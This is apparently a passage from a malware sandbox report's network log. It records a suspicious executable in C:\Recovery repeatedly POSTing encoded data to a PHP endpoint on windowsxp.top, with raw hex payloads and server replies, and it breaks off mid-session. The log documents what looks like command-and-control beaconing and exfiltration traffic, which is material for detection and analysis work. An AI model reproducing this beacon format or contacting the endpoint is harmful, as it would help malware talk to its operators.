                                                                                                                  Data Ascii: PQ]Y[_VRTXWTT\[XYQ[ZRRRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%>X6\5Y#%(.77'('--4) +_/=_*/>:!Y##X(
                                                                                                                  Oct 27, 2024 19:23:31.529575109 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:31.729537964 CET780INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5qNN2%2Be5s07YIhpBc8wvQgs210iKRN7Ujaq992Zc%2FGALem6Uz9joRWNyWuoiJwOQ8%2FVRk%2FB%2BGTV%2BB4xyLHXvWibMDXiSkc%2Fgbij7XCSCMJXn7g07uRHW4uSYVN1Md4Bw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7bda9813ac7-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1364750&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.449967188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:31.854618073 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:32.211734056 CET1012OUTData Raw: 50 50 58 54 5e 53 56 53 54 58 57 54 54 57 5b 5b 59 5a 5b 5d 52 56 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXT^SVSTXWTTW[[YZ[]RVR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[&.76:^":70+#8;*$#--8)Z9.!Y##X(+
                                                                                                                  Oct 27, 2024 19:23:32.473299980 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:32.771877050 CET769INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fE1LQ%2BX5fJn99mvLrpHkEedf857JqTSaUY4GGIHt%2Fs537nycWwA6zo5BJ6wXYvE8OdRoFvlmgU8mc%2F2%2BnsvYpbPpHgWZNfVOD1AzztI3hX7bcJi0kx7rfJMjQbkLQKco"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7c39b25e702-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1304504&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:32.771898031 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.449970188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:32.497273922 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:32.852332115 CET1716OUTData Raw: 50 56 58 5c 5b 59 56 53 54 58 57 54 54 54 5b 5f 59 5d 5b 59 52 5e 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVX\[YVSTXWTTT[_Y][YR^R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1> _ )6#&'-'/$^78+=,8Q#Z8=X><.,?!Y##X('
                                                                                                                  Oct 27, 2024 19:23:33.110871077 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:33.442723989 CET919INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4sTc8ppIPVnbng1zQ6zvO9d2Yn0Ma8kpXN44Nj6r6L7z8dKxzGWBOfgvN0sTwOUrafGtB8oshmwUsOPN9BZ%2FpSHvyFrOVSr8VjWMy8f%2BqD8XzG9r8dEeYeDHXrDl8aR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7c7896be530-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1253679&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5f 22 3e 28 1e 29 3c 2d 55 29 0f 29 5a 30 02 0f 10 2c 0b 2b 02 2a 2d 26 0f 2f 28 25 0e 33 27 29 08 28 17 38 12 23 2d 24 54 2a 25 21 5e 00 1c 24 05 21 10 0f 14 27 38 2c 5c 27 20 30 16 22 2e 2b 5e 2b 3d 26 0c 3f 39 2b 07 2b 38 01 50 2c 11 3e 09 27 29 32 5b 2d 28 22 5f 3c 2a 2a 54 0c 14 21 58 2d 59 23 02 22 31 26 0e 29 31 38 5a 27 10 37 09 33 04 2f 0f 3f 02 37 1b 28 03 14 00 36 5a 34 5d 2b 01 36 14 27 13 09 5c 2a 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"_">()<-U))Z0,+*-&/(%3')(8#-$T*%!^$!'8,\' 0".+^+=&?9++8P,>')2[-("_<**T!X-Y#"1&)18Z'73/?7(6Z4]+6'\*"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.449974188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:32.903196096 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:33.258712053 CET1012OUTData Raw: 55 54 5d 5f 5e 52 56 51 54 58 57 54 54 50 5b 5a 59 58 5b 5f 52 51 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UT]_^RVQTXWTTP[ZYX[_RQRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.,^ )9#5<-34/=;)P#! 8=$=Z&_-!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:33.497855902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:33.700144053 CET768INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIHsf79lZ9BuhhuYBFiHgvdZbKut9POYaJyNQzr2poHdJaZc3Vi7DfrTiZRBCQZ8HNblNQlRu9yteJB%2ByOyWV86rGkm6bm3HHgIdoGBBew7BcILfUlKxCRbOzTUzNOO2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7c9f8e76c14-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1386973&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.449980188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:33.851488113 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:34.196213961 CET1012OUTData Raw: 55 5b 5d 58 5b 58 56 5e 54 58 57 54 54 56 5b 5d 59 51 5b 50 52 53 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[]X[XV^TXWTTV[]YQ[PRSRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1X6"!& .3, (,+#13^,.4?<5-!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:34.468152046 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:34.683489084 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbjEzVxG8KLDp9NuifszSBITyUoYQk5i2s5284nA77%2FF%2FdP%2BobdPr2CBljNbsGlOrkKUwUAz3W1atuufnz899OXL80%2FCPwYenB7nigEFkLd4yZypuNocwq%2BQ8tWy3uAv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7d00db46c6c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1339500&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  58192.168.2.449986188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:34.809389114 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:35.164880991 CET1008OUTData Raw: 55 50 58 5e 5e 58 53 50 54 58 57 54 54 55 5b 5d 59 58 5b 5e 52 5f 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX^^XSPTXWTTU[]YX[^R_R]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&$5*#&.(\088U8.'(<8U71,,[$=,&[9?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:35.406498909 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:35.980652094 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cauI1fF4PZmvKfIZqEel%2F%2FP0tUdN7bzPnhliRgW4v3GDMjAx4geGtAAuJdA9T2XjTQXHHx%2F%2Bhacdf%2BXcUGqhPUxival5%2Fna4hzf6LzjbJt1KZuss0YOiUUhBBQln8vEb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7d5ef3c46e3-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1863&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=799116&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:35.980669022 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0
                                                                                                                  Oct 27, 2024 19:23:35.982347965 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  59192.168.2.449994188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:36.135216951 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:36.493133068 CET1012OUTData Raw: 55 55 58 5a 5e 59 53 57 54 58 57 54 54 57 5b 5a 59 51 5b 5b 52 51 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUXZ^YSWTXWTTW[ZYQ[[RQR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&X/ *9"&,.70 ,-<S(//#T;^,(?/>^-!Y##X(+
                                                                                                                  Oct 27, 2024 19:23:36.755479097 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:36.963280916 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4cd%2B%2FGhqY1ETM6fNJ1PMg5r0xBzuDbyWWB5Km8tQfPmPkbD%2BIikN57MlTtIOUANOmNUPZyMLKRKxYf1lRGUwbHT9b5ebx6WG2UlB7LOJn%2BSxEhbB68FxTY1h7jAEnQy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7de5a764683-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1278&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1164923&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  60192.168.2.449999188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:37.088004112 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:37.446393013 CET1012OUTData Raw: 55 57 58 5a 5e 58 56 57 54 58 57 54 54 5d 5b 59 59 5c 5b 5e 52 53 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWXZ^XVWTXWTT][YY\[^RSRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y&/"9"5;.'(Y0+#,?)+#?_,.?>>:!Y##X(
                                                                                                                  Oct 27, 2024 19:23:37.697647095 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:37.965328932 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QS8iyG7yXgBtN2Td6xlmSey0jXaTf7Muz8L9MaZYt%2F4vGacn9I%2FsnjG%2FBQSnj3mJQUG3vLTzrKzl85YDl53ouUdWZA3YbDCzZjIwv6FdoC2UqV%2FOgL%2Fu4kf5MHLz37G"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7e4385b6b3c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1263&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1121611&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:37.965369940 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  61192.168.2.450008188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:38.089286089 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:38.446259975 CET1012OUTData Raw: 55 57 58 58 5e 52 56 56 54 58 57 54 54 56 5b 5d 59 5e 5b 5c 52 52 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWXX^RVVTXWTTV[]Y^[\RRRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']1>":"!6_9?'7/.;(,?70/0*!.?!Y##X(/


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  62192.168.2.450009188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:38.483093977 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:38.839912891 CET1716OUTData Raw: 55 51 58 54 5e 5e 56 5e 54 58 57 54 54 5c 5b 5c 59 5a 5b 51 52 55 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQXT^^V^TXWTT\[\YZ[QRURST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y13 ):!?.$#08',-?>4--*,*Z-/!Y##X(
                                                                                                                  Oct 27, 2024 19:23:39.057583094 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:39.363708019 CET923INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
